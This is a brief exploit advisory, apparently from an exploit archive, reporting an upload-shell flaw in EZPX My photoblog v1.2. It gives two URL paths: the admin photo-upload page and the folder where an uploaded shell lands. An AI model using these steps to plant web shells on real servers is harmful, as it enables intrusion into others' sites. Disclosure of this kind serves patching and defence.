id: 10427
date: 12/26/2009
title: EZPX My photoblog v1.2 Upload Shell Vulnerability
author: indoushka
cves: 

=================================================
EZPX My photoblog v1.2 Upload Shell Vulnerability
=================================================

========================================================================================                 
| # Title    : EZPX My photoblog Upload Shell Vulnerability                            |
| # Author   : indoushka                                                               |
| # Script   : Powered by EZPX My photoblog http://ezpx.org/                           |
| # Tested on: windows SP2 Fran?ais V.(Pnx2 2.0) + Lunix Fran?ais v.(9.4 Ubuntu)       |
| # Bug      : Upload Shell                                                            |
======================      Exploit By indoushka       =================================
| # Exploit  :
| 1- http://server/ezpx-1.2-beta/index.php?/admin/photos/upload
| 2- http://server/ezpx-1.2-beta/content/photos



#  0day.today [2023-03-25]  #